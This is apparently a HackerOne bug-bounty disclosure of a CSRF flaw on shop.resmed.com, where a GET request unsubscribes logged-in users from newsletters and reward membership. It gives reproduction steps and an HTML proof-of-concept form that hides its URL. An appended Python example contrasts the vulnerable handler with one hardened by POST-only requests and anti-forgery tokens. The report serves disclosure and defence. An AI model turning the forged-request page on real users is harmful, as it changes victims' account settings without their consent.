hackerone / Pranav-pranayx01 / H1:1685489
History: Aug 30, 2022 - 1:28 p.m.

ResMed: [shop.resmed.com]CSRF leads to Unsubscribe victim from Communication and Reward Membership

2022-08-30 13:28:11
pranav-pranayx01
hackerone.com

Hello, Team
While testing on your main domain I discovered a CSRF attack which leads to unsubscribing victims from Communication/Reward Membership. This is more of an in-depth security issue with a reasonable attack scenario.

Description:
It is possible to unsubscribe a logged-in user from any subscribed events. The unsubscribe is done by a GET-call, which is (of course) not protected by an anti-CSRF token. It would be very easy to make an attack page including all events and unsubscribe all users. The same CSRF html code can also be used to subscribe and unsubscribe all users from your specific activities.

Steps To Reproduce:

  1. User should be logged in to https://shop.resmed.com/
  2. Go to your profile; you will find Communication and Reward Memberships. Intercept the unsubscribe request.
  3. Generate the CSRF PoC of this endpoint https://shop.resmed.com/GB/en/my-account/update-subscriptions
  4. User should visit a page with the following HTML (for example, triggering the GET in any way is good enough):

<html>
<body>
<!-- Hide the PoC URL from the address bar -->
<script>history.pushState('', '', '/')</script>
<!-- GET form: no anti-CSRF token is required by the endpoint -->
<form action="https://shop.resmed.com/GB/en/my-account/update-subscriptions">
<input type="hidden" name="changeType" value="changeNewsletterSubscription" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

  5. User is unsubscribed from the specific activities.

Mitigation:
Do not use the GET-method for any operation that changes something. Next, add an anti-forgery token as is present everywhere on the site.

Supporting Material/References:
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)

Please feel free to ask if you need a PoC video, but I think the steps to reproduce are enough for reproducing the issue.

Regards,
Pranav_PranayX01

Impact

An attacker is able to unsubscribe the victim from Communication and Reward Memberships.
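The mitigation the report recommends (no state change on GET, plus an anti-forgery token) can be shown in a small server-side model. The following is an added illustration written for this page, not ResMed's code: it places a GET-driven handler like the one reported beside a hardened handler that requires POST, a per-session token compared in constant time, and a same-origin Sec-Fetch-Site when the browser sends one. The session and request classes, the second changeType value, and the csrf_token parameter name are assumptions made for the example; only the changeNewsletterSubscription value comes from the report.

```python
"""Vulnerable vs. hardened update-subscriptions handler (illustrative, not ResMed's code)."""
import hmac
import secrets
from dataclasses import dataclass, field

# changeType values -> subscription topic. The first is from the report; the
# second is an assumed name used only to make the example more than one topic.
SUBSCRIPTION_CHANGES = {
    "changeNewsletterSubscription": "newsletter",
    "changeRewardsSubscription": "rewards",  # assumption for illustration
}


@dataclass
class Session:
    """Constructed stand-in for a logged-in user's server-side session."""
    user_id: str
    subscriptions: set = field(default_factory=lambda: {"newsletter", "rewards"})
    # One unguessable token per session; embedded in the site's own forms.
    csrf_token: str = field(default_factory=lambda: secrets.token_urlsafe(32))


@dataclass
class Request:
    """Constructed stand-in for an incoming HTTP request bound to a session."""
    method: str
    params: dict
    session: Session
    headers: dict = field(default_factory=dict)


def _toggle(session: Session, change_type: str) -> int:
    """Flip the named subscription; 400 for an unknown changeType."""
    topic = SUBSCRIPTION_CHANGES.get(change_type)
    if topic is None:
        return 400
    if topic in session.subscriptions:
        session.subscriptions.remove(topic)
    else:
        session.subscriptions.add(topic)
    return 200


def update_subscriptions_vulnerable(req: Request) -> int:
    """Pattern from the report: any method, no token. A cross-site GET
    (auto-submitted form, image tag, link) changes state using the
    victim's ambient session cookie."""
    return _toggle(req.session, req.params.get("changeType", ""))


def csrf_check(req: Request) -> int:
    """Return 200 if the request may change state, else an error status."""
    if req.method != "POST":
        return 405  # state changes only via POST
    fetch_site = req.headers.get("Sec-Fetch-Site")
    # Modern browsers label cross-site requests; absent header = older client.
    if fetch_site not in (None, "same-origin"):
        return 403
    supplied = req.params.get("csrf_token", "")
    # Constant-time comparison against the session-bound token.
    if not hmac.compare_digest(supplied, req.session.csrf_token):
        return 403
    return 200


def update_subscriptions_hardened(req: Request) -> int:
    """Same operation, gated by method and anti-forgery token checks."""
    status = csrf_check(req)
    if status != 200:
        return status
    return _toggle(req.session, req.params.get("changeType", ""))


if __name__ == "__main__":
    victim = Session("victim")
    forged = Request("GET", {"changeType": "changeNewsletterSubscription"},
                     victim, {"Sec-Fetch-Site": "cross-site"})
    print("vulnerable:", update_subscriptions_vulnerable(forged), victim.subscriptions)
    victim = Session("victim")
    print("hardened, forged GET:", update_subscriptions_hardened(forged.__class__(
        "GET", forged.params, victim, forged.headers)), victim.subscriptions)
    legit = Request("POST", {"changeType": "changeNewsletterSubscription",
                             "csrf_token": victim.csrf_token},
                    victim, {"Sec-Fetch-Site": "same-origin"})
    print("hardened, legitimate POST:", update_subscriptions_hardened(legit), victim.subscriptions)
```

The token check alone closes the reported issue; the method restriction and Sec-Fetch-Site check are defence in depth, since a GET that changes state can also be triggered by prefetchers and link previews without any attacker page.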